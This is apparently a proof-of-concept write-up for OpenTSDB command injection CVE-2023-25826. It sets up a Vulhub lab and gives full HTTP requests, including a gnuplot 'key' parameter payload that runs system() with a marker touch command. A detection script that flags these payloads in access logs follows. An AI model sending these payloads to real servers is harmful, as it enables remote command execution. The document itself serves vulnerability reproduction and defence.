Awesome-POC/数据库漏洞/OpenTSDB 命令注入漏洞 CVE-2023-25826.md
2024-11-06 14:10:36 +08:00

# OpenTSDB Command Injection Vulnerability CVE-2023-25826
## Vulnerability Description
OpenTSDB is a distributed, scalable time-series database built on HBase. Versions 2.4.1 and earlier contain a command injection vulnerability. The flaw is the result of an incomplete fix for the earlier CVE-2020-35476, so the reproduction steps closely follow that one.
References:
- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/)
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)
## Environment Setup
Run the following command in Vulhub to start an OpenTSDB 2.4.1 instance:
```shell
docker-compose up -d
```
Once the service is up, visit `http://your-ip:4242` to see the OpenTSDB web interface.
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png)
## Reproduction
Everything up to this point is the same as for CVE-2020-35476: you need to know the name of a metric, and the metric list can be viewed at `http://your-ip:4242/api/suggest?type=metrics&q=&max=10`.
Here the metric list is empty. However, this OpenTSDB instance has automatic metric creation enabled (`tsd.core.auto_create_metrics = true`), so the following API call can be used to create a metric named `sys.cpu.nice` and add one data point:
```http
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150

{
  "metric": "sys.cpu.nice",
  "timestamp": 972388800,
  "value": 20,
  "tags": {
    "host": "web01",
    "dc": "lga"
  }
}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png)
If the target OpenTSDB already has metrics and the list is not empty, the step above is unnecessary.
Send the CVE-2020-35476 payload:
```http
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
The server returns an error:
```json
{"err":"'yrange' was invalid. Must be in the format [min:max]."}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png)
One point where CVE-2023-25826 bypasses the fix is the `key` parameter:
```shell
# CVE-2020-35476
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
# CVE-2023-25826
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
```
Send the request:
```http
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png)
Entering the container, you can see that `touch /tmp/awesome_poc` has executed successfully:
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png)
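Added here as a detection example, not part of the original write-up or of the OpenTSDB project: a small Python scanner that pulls `/q` requests out of access-log lines and flags gnuplot-bound parameters that carry command separators, quoting or `system`, which is exactly what distinguishes the two request paths above (the `yrange` one and the `key` one) from a normal graph request. The set of gnuplot-bound parameters and the allowlist for `key` are assumptions, not taken from OpenTSDB's source.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters that OpenTSDB's /q handler passes into the gnuplot script it generates.
# Assumed from the parameters used in this write-up; extend to match your deployment.
GNUPLOT_PARAMS = {"xrange", "yrange", "y2range", "key", "ylabel", "y2label", "style", "wxh"}

# Characters and words that a range, label or key option never needs but gnuplot acts on:
# command separators, quoting, parentheses and the system()/shell built-ins.
SUSPICIOUS_RE = re.compile(r"""[;"'`()\\]|\bsystem\b|\bshell\b""", re.IGNORECASE)

# Allowlist for `key`: gnuplot key-placement words only (assumed; tighten to what your users need).
KEY_RE = re.compile(r"^(?:(?:out|in|left|right|top|bottom|center|box|nobox|horizontal|vertical)\s*)*$")

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(path):
    """Return {param: decoded value} for gnuplot-bound parameters of a /q request that look injected."""
    parts = urlsplit(path)
    if parts.path != "/q":
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in GNUPLOT_PARAMS:
            continue
        for value in values:  # parse_qs has already percent-decoded the value
            if SUSPICIOUS_RE.search(value) or (name == "key" and not KEY_RE.match(value)):
                hits[name] = value
    return hits


def scan_log(lines):
    """Return [(line_number, hits)] for access-log lines whose /q request carries a suspicious parameter."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m and (hits := suspicious_params(m.group(1))):
            findings.append((n, hits))
    return findings


# Constructed access-log lines: the two request paths from this write-up plus one benign graph request.
SAMPLE_LOG = [
    '172.17.0.1 - - [07/Mar/2024:17:21:16 +0800] "GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 400 65',
    '172.17.0.1 - - [07/Mar/2024:17:22:38 +0800] "GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1" 200 0',
    '172.17.0.1 - - [07/Mar/2024:17:30:02 +0800] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&key=out%20right%20top&yrange=[0:100]&wxh=800x400&json HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hits}")
```

Note that the `yrange` request is flagged even though the server already rejected it with a 400: a rejected attempt is still worth an alert, because the same client is likely to try the `key` variant next.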